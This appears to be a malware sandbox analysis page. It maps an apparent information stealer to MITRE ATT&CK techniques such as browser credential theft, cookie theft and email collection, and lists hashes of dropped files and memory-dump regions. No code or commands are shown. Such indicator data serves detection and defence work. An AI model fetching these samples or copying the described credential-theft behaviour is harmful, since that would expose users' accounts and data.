Modify Authentication Process

T1556

Privilege Escalation

Defense Evasion

Modify Authentication Process

T1556

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\metadata

Filesize
114B

MD5
cc5fc5f0121b4cdc58681c0858a4d37a

SHA1
5b9e0e43af198057cfce8f422bd7769dcc9523bd

SHA256
4c38ae1467dfa863d31ad1112049cd8b71d568d77b7b6a646a8f1c8e414db033

SHA512
b6dc7dd5c42fb8ac36467289bca6b119774d51860b88ceef948885fcb7687980e779951edb81f7a7fcb8256baf338203fe3f2f92a8131ab313379f9cfe7aaac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\reports\f49638ce-a56b-49cd-bac1-1ad3de0f4486.dmp

Filesize
566KB

MD5
e43e101c9626fe58795767137e7c1218

SHA1
fc923dc1b701675eeb033d1241f4a3192e47c86a

SHA256
13bdbed9923529ab9ce17b51f83405a4fc46115c809d0b5c87d3c4a18ef86003

SHA512
b972991f88d28d0388e780db9b41d78eae1c2cef68f2cac506fe5c7412162367ec28e4c17876771b55aedfc5eb6708acb9e57d2bf1cfc78f1fece5de131a035f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
bf6ce6ac72dde4a5ec864bd19454f34f

SHA1
817f6e4fceb3c6a0acc1376ca05276fd4d52603e

SHA256
e75dceb36299e3a41c7d425da6fc2a8a7c281f5d5caead8250de7e2cf207556d

SHA512
67af8f3fd1c2445e4357f42c9fc3fe15cbbe3ffea8538d7ea76d75f41e9dfcd34d1aeb4362051d83ac8768d699c7e0912ba2bf8eaa0de7aba5af38843d0979df

Download Submit
C:\Users\Admin\AppData\Local\Temp\ybwfazcdncdywatdimovkgf

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
\Users\Admin\AppData\Local\Temp\nso7447.tmp\System.dll

Filesize
11KB

MD5
a436db0c473a087eb61ff5c53c34ba27

SHA1
65ea67e424e75f5065132b539c8b2eda88aa0506

SHA256
75ed40311875312617d6711baed0be29fcaee71031ca27a8d308a72b15a51e49

SHA512
908f46a855480af6eacb2fb64de0e60b1e04bbb10b23992e2cf38a4cbebdcd7d3928c4c022d7ad9f7479265a8f426b93eef580afec95570e654c360d62f5e08d

Download Submit
memory/308-20-0x0000000077A50000-0x0000000077BF9000-memory.dmp

Filesize
1.7MB

Download
memory/308-19-0x0000000077A51000-0x0000000077B52000-memory.dmp

Filesize
1.0MB

Download
memory/308-18-0x0000000004470000-0x0000000005609000-memory.dmp

Filesize
17.6MB

Download
memory/580-84-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/580-82-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/580-83-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1712-67-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/1712-78-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/2780-55-0x0000000033470000-0x00000000334A4000-memory.dmp

Filesize
208KB

Download
memory/2780-104-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-112-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-111-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-54-0x0000000033470000-0x00000000334A4000-memory.dmp

Filesize
208KB

Download
memory/2780-51-0x0000000033470000-0x00000000334A4000-memory.dmp

Filesize
208KB

Download
memory/2780-49-0x00000000014F0000-0x0000000002689000-memory.dmp

Filesize
17.6MB

Download
memory/2780-110-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-48-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-44-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-22-0x0000000077A50000-0x0000000077BF9000-memory.dmp

Filesize
1.7MB

Download
memory/2780-21-0x00000000014F0000-0x0000000002689000-memory.dmp

Filesize
17.6MB

Download
memory/2780-95-0x0000000032920000-0x0000000032939000-memory.dmp

Filesize
100KB

Download
memory/2780-98-0x0000000032920000-0x0000000032939000-memory.dmp

Filesize
100KB

Download
memory/2780-99-0x0000000032920000-0x0000000032939000-memory.dmp

Filesize
100KB

Download
memory/2780-100-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-101-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-102-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-103-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-109-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-105-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-106-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-107-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2780-108-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2816-80-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2816-76-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2816-77-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2816-79-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.